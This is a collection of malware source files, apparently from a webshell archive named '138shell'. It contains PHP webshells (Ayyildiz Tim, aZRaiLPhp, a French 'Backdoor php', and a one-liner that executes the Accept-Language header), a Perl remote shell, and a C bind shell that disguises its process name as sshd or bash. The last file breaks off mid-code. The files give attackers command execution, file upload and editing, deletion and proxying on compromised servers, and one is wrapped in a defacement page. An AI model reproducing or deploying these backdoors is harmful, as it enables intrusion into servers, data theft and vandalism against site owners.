return htmlspecialchars($contents);
}
if($_POST['save'])writef($file,$_POST['data']);
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
}
//end editors
?>
</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
<? echo $footer;?>
================================================
FILE: 138shell/A/Asmodeus v0.1.pl.txt
================================================
#!/usr/bin/perl
#
# Asmodeus v0.1
# Perl Remote Shell
# by phuket
# www.smoking-gnu.org
#
# (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url]
#
# perl asmodeus.pl client 6666 127.0.0.1
# perl asmodeus.pl server 6666
#
use Socket;
$cs=$ARGV[0];
$port=$ARGV[1];
$host=$ARGV[2];
if ($cs eq 'client') {&client}
elsif ($cs eq 'server') {&server}
sub client{
socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$internet_addr = inet_aton("$host") or die "ALOA:$!\n";
$paddr=sockaddr_in("$port", $internet_addr);
connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n";
open(STDIN, ">&TO_SERVER");
open(STDOUT, ">&TO_SERVER");
open(STDERR, ">&TO_SERVER");
print "Asmodeus Perl Remote Shell\n";
system(date);
system("/bin/sh");
close(TO_SERVER);
}
sub server{
$proto=getprotobyname('tcp');
$0="asm";
$system='/bin/sh';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
print "Asmodeus Perl Remote Shell\n";
system(date);
system("/bin/sh");
close(STDIN);
close(STDOUT);
close(STDERR);
return;
}
}
================================================
FILE: 138shell/A/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt
================================================
<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Ayyildiz Tim | AYT | Shell v 2.1 Biz Büyük Türk Milletinin Hizmetindeyiz...</title>
</head>
<body>
</body>
</html>
<html>
<head>
<meta name="distribution" content="GLOBAL">
<META name="ROBOTS" content="ALL">
<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
<meta name="Copyright" content=TouCh By iJOo">
<META NAME="RATING" CONTENT="GENERAL">
<meta name="Description" content="Thehacker">
<meta name="KeyWords" content="DefaCed">
<title>HACKED BY AYYILDIZ </title>
<STYLE TYPE="text/css">
<!--
body {
scrollbar-3d-light-color : #404040;
scrollbar-arrow-color: black;
scrollbar-base-color: black;
scrollbar-darkshadow-color: #404040;
scrollbar-face-color: black;
scrollbar-highlight-color: #404040;
scrollbar-shadow-color: black;
scrollbar-track-color: #404040; }
-->
</STYLE>
<script language="JavaScript1.2">
function disableselect(e){
return false
}
function reEnable(){
return true
}
//if IE4+
document.onselectstart=new Function ("return false")
//if NS6
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
</head>
<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
<bgsound src="bayrak.mp3" loop="infinite">
<center><font color="red" size="10" face="Imprint MT Shadow">
</font>
<TR>
<TD vAlign=center align=left width=144>
<SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
</TD>
<TD vAlign=center align=left width=5></TD>
<TD width=470><BR>
<P align=left></P></TD></TR>
<TR>
<TD vAlign=center align=left width=144></TD>
<TD vAlign=center align=left width=5></TD>
<TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
<STYLE>BODY {
BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
}
.ldtab1 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtab2 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtab3 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtxt1 {
PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
}
.ldtxt2 {
FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:link {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:visited {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:active {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:hover {
BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
}
A {
TEXT-DECORATION: none
}
</STYLE>
<!-- MELEK -->
<DIV align=center>
<DIV id=welle
style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT
color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT
color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT
color=#ff0000></DIV></DIV>
<DIV align=center></DIV>
<SCRIPT language=JavaScript>
<!--
function welle()
{
if(document.all.welle.filters[0].freq > 10)
document.all.welle.filters[0].freq = 5;
document.all.welle.filters[0].freq += 1;
if(document.all.welle.filters[0].phase > 100)
document.all.welle.filters[0].phase = 0;
document.all.welle.filters[0].phase += 10;
if(document.all.welle.filters[0].strength > 10)
document.all.welle.filters[0].strength = 1;
document.all.welle.filters[0].strength += 1;
window.setTimeout("welle()",100);
}
welle();
file://-->
</SCRIPT>
</FONT></TD></TR></TBODY></TABLE></DIV>
<?php
define('PHPSHELL_VERSION', '');
?>
<html>
<head>
<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
<style type="text/css">
<!--
.style1 {color: #FF0000}
.style2 {
font-family: Tahoma;
font-size: 9px;
font-weight: bold;
}
-->
</style>
</head>
<body>
<div align="center">
<table width="918" height="484" border="15">
<tr>
<td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
<div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span> <?php
if (ini_get('register_globals') != '1') {
/* We'll register the variables as globals: */
if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS);
if (!empty($HTTP_GET_VARS))
extract($HTTP_GET_VARS);
if (!empty($HTTP_SERVER_VARS))
extract($HTTP_SERVER_VARS);
}
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == '/') {
$new_dir = $regs[1]; // 'cd /something/...'
} else {
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
unset($command);
}
}
}
if (file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?>
</div>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
<p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
<?php
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
$path = '';
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= '/' . $work_dir_splitted[$i];
printf('<a href="%s?work_dir=%s">%s</a>/',
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
}
}
?>
</b></p>
<p align="center"><strong>Dizin Degistir</strong> :
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
} elseif ($dir == '..') {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There's no
parent directory then. */
} elseif (strrpos($work_dir, '/') == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo "<option value=\"/\">Parent Directory</option>\n";
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
} else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select>
</p>
<p align="center"><strong>Komut</strong>:
<input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Komut Calistir">
</p>
<p align="center"><strong>Surekli Bagli Kal</strong>
<input type="checkbox" name="stderr">
</p>
<div align="center">
<textarea name="textarea" cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
system($command);
}
?>
</textarea>
</div>
</form>
<div align="center">
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
</div> <hr align="center"> <p align="center" class="style2">Copyright © 2006–2007, Powered byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
<p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
<p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
</tr>
</table>
</div>
</body>
</html>
</font></font></font></font></font></font></font></font></font></font></font>
</font>
<!--
/*
I Always Love Sha
*/
</BODY></HTML>
================================================
FILE: 138shell/A/aZRaiLPhp v1.0.txt
================================================
<?php
$default=$DOCUMENT_ROOT;
$this_file="./azrailphp.php";
if(isset($save)){
$fname=str_replace(" ","_",$fname);
$fname=str_replace("%20","_",$fname);
header("Cache-control: private");
header("Content-type: application/force-download");
header("Content-Length: ".filesize($save));
header("Content-Disposition: attachment; filename=$fname");
$fp = fopen($save, 'r');
fpassthru($fp);
fclose($fp);
unset($save);
exit;
}
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SLND:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
}
if ($op=='phpinfo'){
$fonk_kap = get_cfg_var("fonksiyonlar_kapat");
echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu almyiii</center>";
exit;
}
echo "<html>
<head>
<title>azrail 1.0 by C-W-M</title>
</head>
<body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
</body>";
echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
<center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
<br>";
echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
echo "<br>
<br>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<div align=center>
<font size='+1' color='#0000FF'>Root Klasr: $DOCUMENT_ROOT</font><br>
<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
if(!isset($dir)){
$dir="$default";
}
echo "<input type=text size=60 name=dir value='$dir'>
<input type=submit value='GIT'><br>
</form>
</div>";
if ($op=='up'){
$path=dir;
echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
if(isset($dosya_gonder)) {
if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
echo "<center><font color='#0000FF'>Dosya Baaryla Gnderildi</font></center>";
}
} elseif(empty($dosya_gonder)) {
$path=$dir;
$dir = $dosya_dizin;
echo "$dir";
echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
echo "</form>";
echo "</html>";
} else {
die ("<center><font color='#FF0000'>Dosya kopyalanamyor!</font><center>");
}
}
if($op=='mf'){
$path=$dir;
if(isset($dismi) && isset($kodlar)){
$ydosya="$path/$dismi";
if(file_exists("$path/$dismi")){
$dos= "Byle Bir Dosya Vard zerine Yazld";
} else {
$dos = "Dosya Oluturuldu";
}
touch ("$path/$dismi") or die("Dosya Oluturulamyor");
$ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak iin alamyor");
fwrite($ydosya2, $kodlar) or die("Dosyaya yazlamyor");
fclose($ydosya2);
echo "<center><font color='#0000FF'>$dos</font></center>";
} else {
echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
echo "<center>Dosya smi :<input type='text' name='dismi'></center><br>";
echo "<br>";
echo "<center>KODLAR</center><br>";
echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
}
if($op=='md'){
$path=$dir;
if(isset($kismi) && isset($okmf)){
$klasr="$path/$kismi";
mkdir("$klasr", 0777) or die ("<center><font color='#0000FF'>Klasr Oluturulamyor</font></center>");
echo "<center><font color='#0000FF'>Klasr Oluturuldu</font></center>";
}
echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
echo "<center>Klasr smi :<input type='text' name='kismi'></center><br>";
echo "<br>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
if($op=='del'){
unlink("$fname");
}
if($op=='dd'){
$dir=$here;
$deldirs=$yol;
if(!file_exists("$deldirs")) {
echo "<font color=\"#ff0000\">Dosya Yok</font>";
} else {
deltree($deldirs);
}
}
if($op=='edit'){
$yol=$fname;
$yold=$path;
if (isset($ok)){
$dosya = fopen("$yol", 'w') or die("Dosya Alamyor");
$metin=$tarea;
fwrite($dosya, $metin) or die("Yazlamyor!");
fclose($dosya);
echo "<center><font color='#0000FF'Dosya Baaryla Dzenlendi</font></center>";
} else {
$path=$dir;
echo "<center>DZENLE: $yol</center>";
$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Alamyor</font></center>");
$boyut=filesize($yol);
$duzen = @fread ($dosya, $boyut);
echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
fclose($dosya);
$duzen=htmlspecialchars($duzen);
echo "</form>";
}
}
if($op=='efp2'){
$fileperm=base_convert($_POST['fileperm'],8,10);
echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 SML DOSYANIN</font></b>" : "<font color=\"#ff0000\">DETRLEMED!!</font>";
echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DETRLD</font>";
}
if($op=='efp'){
$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
echo "<form method=post action=./$this_file?op=efp2>
<div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
<input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
<input name='dir' type='hidden' value='$yol'>
<input type='submit' value='TAMAM' class='input'></div><br>
</form>";
}
$path=$dir;
if(isset($dir)){
if ($dir = @opendir("$dir")) {
while (($file = readdir($dir)) !== false) {
if($file!="." && $file!=".."){
if(is_file("$path/$file")){
$disk_space=filesize("$path/$file");
$kb=$disk_space/1024;
$total_kb = number_format($kb, 2, '.', '');
$total_kb2="Kb";
echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>dzenle</a> - ";
echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
echo "<br></div>\n";
}else{
echo "<div align=left><a href='./$this_file?dir=$path/$file'>GT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<font color='#FFFF00'>$dirperm</font>";
echo " <br></div>\n";
}
}
}
closedir($dir);
}
}
echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasrne Git</a></center>";
if(file_exists("B:\\")){
echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
} else {}
if(file_exists("C:\\")){
echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
} else {}
if (file_exists("D:\\")){
echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
} else {}
if (file_exists("E:\\")){
echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
} else {}
if (file_exists("F:\\")){
echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
} else {}
if (file_exists("G:\\")){
echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
} else {}
if (file_exists("H:\\")){
echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
} else {}
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>SERVER BLGLER</b></font><br></center>";
echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
echo "<br>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>LEMLER</b></font><br></center>";
echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gnder</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Olutur</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasr Olutur</a></font></center>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center>Tm haklar sahibi C-W-M'ye aittir</center><br>";
?>
================================================
FILE: 138shell/A/accept_language.txt
================================================
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
================================================
FILE: 138shell/B/Blind Shell.cpp.txt
================================================
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <stdlib.h>
#include <sys/socket.h>
#define BUFSIZ 256
int main(int argc,char *argv[]){
int insock,s,port=31337;
char pass[BUFSIZ+2]="foo";
ssize_t size;
struct sockaddr_in servaddr,cliaddr;
unsigned int len;
char *newname;
if(fork()!=0)
return 0;
srand(time(NULL));
switch(rand()%4) {
case 0:
newname="sshd";
break;
case 1:
newname="-bash";
break;
case 2:
newname="sh";
break;
case 3:
newname="ps";
}
memset(argv[0],0,strlen(argv[0]));
strcpy(argv[0],newname);/*changeprocessname*/
close(0);
close(1);
close(2);
servaddr.sin_family=AF_INET;
servaddr.sin_port=htons(port);
servaddr.sin_addr.s_addr=htonl(INADDR_ANY);
s=socket(AF_INET,SOCK_STREAM,0);
bind(s,(struct sockaddr*)&servaddr,sizeof(servaddr));
listen(s,10);
for(;;) {
len=sizeof(cliaddr);
insock=accept(s,(struct sockaddr*)&cliaddr,&len);
if(fork()==0) {
char buf[BUFSIZ+2]={};
send(insock,"pass?",6,0);
size=recv(insock,&buf,BUFSIZ,0);
if(strncmp(buf,pass,strlen(pass))) {
send(insock,"WRONG!\n",8,0);
close(insock);
exit(0);
}
dup2(insock,0);
dup2(insock,1);
dup2(insock,2);
execl("/bin/sh","sh","-i",(char*)0);
close(insock);
exit(-1); /* should not reach this point */
}
}
}
================================================
FILE: 138shell/B/backdoor1.txt
================================================
<?
/*
Backdoor php v0.1
Coded By Charlichaplin
charlichaplin@gmail.com
Join me: irc.fr.worldnet.net #s-c
Greetz: My dog :)
*/
class backdoor {
var $pwd;
var $rep;
var $list = array();
var $file;
var $edit;
var $fichier;
var $del;
var $shell;
var $proxy;
function dir() {
if(!empty($this->rep)) {
$dir = opendir($this->rep);
} else {
$dir = opendir($this->pwd);
}
while($f = readdir($dir)) {
if ($f !="." && $f != "..") {
$this->list[] = $f;
}
}
}
function view() {
$this->file = htmlentities(highlight_file($this->file));
}
function edit() {
if(!is_writable($this->edit)) {
echo "Ecriture impossible sur le fichier";
} elseif(!file_exists($this->edit)) {
echo "Le fichier n'existe pas ";
} elseif(!$this->fichier) {
$fp = fopen($this->edit,"r");
$a = "";
while(!feof($fp)) {
$a .= fgets($fp,1024);
}
echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";
} else {
$fp = fopen($this->edit,"w+");
fwrite($fp, $this->fichier);
fclose($fp);
echo "Le fichier a t modifi";
}
}
function del() {
if(is_file($this->del)) {
if(unlink($this->del)) {
echo "Fichier supprim";
} else {
echo "Vous n'avez pas les droits pour supprimer ce fichier";
}
} else {
echo $this->del." n'est pas un fichier";
}
}
function shell() {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
system($this->shell);
}
function proxy($host,$page) {
$fp = fsockopen($host,80);
if (!$fp) {
echo "impossible d'etablir un connection avec l'host";
} else {
$header = "GET ".$page." HTTP/1.1\r\n";
$header .= "Host: ".$host."\r\n";
$header .= "Connection: close\r\n\r\n";
fputs($fp,$header);
while (!feof($fp)) {
$line = fgets($fp,1024);
echo $line;
}
fclose($fp);
}
}
function ccopy($cfichier,$cdestination) {
if(!empty($cfichier) && !empty($cdestination)) {
copy($cfichier, $cdestination);
echo "Le fichier a t copi";
} else {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
}
}
}
if(!empty($_REQUEST['rep'])) {
$rep = $_REQUEST['rep']."/";
}
$pwd = $_SERVER['SCRIPT_FILENAME'];
$pwd2 = explode("/",$pwd);
$file = $_REQUEST['file'];
$edit = $_REQUEST['edit'];
$fichier = $_POST['fichier'];
$del = $_REQUEST['del'];
$shell = $_REQUEST['shell'];
$proxy = $_REQUEST['proxy'];
$copy = $_REQUEST['copy'];
$cfichier = $_POST['cfichier'];
$cdestination = $_POST['cdestination'];
$n = count($pwd2);
$n = $n - 1;
$pwd = "";
for ($i = 0;$i != $n;$i = $i+1) {
$pwd .= "/".$pwd2[$i];
}
if($proxy) {
$host2 = explode("/",$proxy);
$n = count($host2);
$host = $host2[2];
$page = "";
for ($i = 3;$i != $n;$i = $i+1) {
$page .= "/".$host2[$i];
}
echo $page;
}
echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
$backdoor = new backdoor();
$backdoor->pwd = $pwd;
$backdoor->rep = $rep;
$backdoor->file = $file;
$backdoor->edit = $edit;
$backdoor->fichier = $fichier;
$backdoor->del = $del;
$backdoor->shell = $shell;
$backdoor->proxy = $proxy;
echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
$backdoor->dir();
echo "</TD></TR></TABLE><PRE>";
echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\" \"> <A HREF=\"\">Name</A> <A HREF=\"\">Last modified</A> <A HREF=\"\">Size</A> <A HREF=\"\">Description</A>";
echo "<HR noshade align=\"left\" width=\"80%\">";
if($file) {
$backdoor->view();
} elseif($edit) {
$backdoor->edit();
} elseif($del) {
$backdoor->del();
} elseif($shell) {
$backdoor->shell();
}elseif($proxy) {
$backdoor->proxy($host,$page);
}elseif($copy == 1) {
$backdoor->ccopy($cfichier,$cdestination);
} else {
echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A> ".date("r",realpath($rep."../"))." - <br>";
foreach ($backdoor->list as $key => $value) {
if(is_dir($rep.$value)) {
echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A> ".date("r",filemtime($rep.$value))." - <br>";
} else {
echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A> <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a> ".date("r",filemtime($rep.$value))." 1k <br>";
}
}
}
echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
echo "<center><b>Coded By Charlichaplin</b></center>";
echo "</BODY></HTML>";
================================================
FILE: 138shell/B/backdoorfr.txt
================================================
<?
print("<html><head><title>Backdoor PHP code par rAidEn & LFL</title></head><body
bgcolor=\"white\" LINK=\"blue\" VLINK=\"blue\">");
print("<p align=\"center\"><font size=\"5\">Exploit include v1.0</font></p>");
print("<p>Ce script permet d'exploiter une faille include ou une frame mal place de type :
www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tant que backdoor sur un serveur pour garder une porte d'entre drobe.<br><br>
<u>par rAidEn & LFL , article publi dans The Hackademy Journal numro 12</u><br><br>Spcial greetz : Crash_FR, MatraX, Elboras, papar0ot, Lostnoobs, Icarus, Xelory, L_Abbe, Daedel, DHS-team, Carlito, xdream_blue, redils, IHC, Wanadobe.biz, #abyssal, #cod4, #hzv, #security-corp, #Revolsys, ...... et tout ceux que j'ai oubli & aussi et surtout (feu)tim-team</p>");
/******Code source du systme de remote*****/
$QS = $QUERY_STRING;
if(!stristr($QS, "separateur") && $QS!="") $QS .= "&separateur";
if(!stristr($QS, "separateur") && $QS=="") $QS .= "separateur";
/*pour les forms*********************************/
$tab = explode("&", $QS);
$i=0;
$remf = "";
while( $tab[$i] != "" && $tab[$i-1] != "separateur" )
{
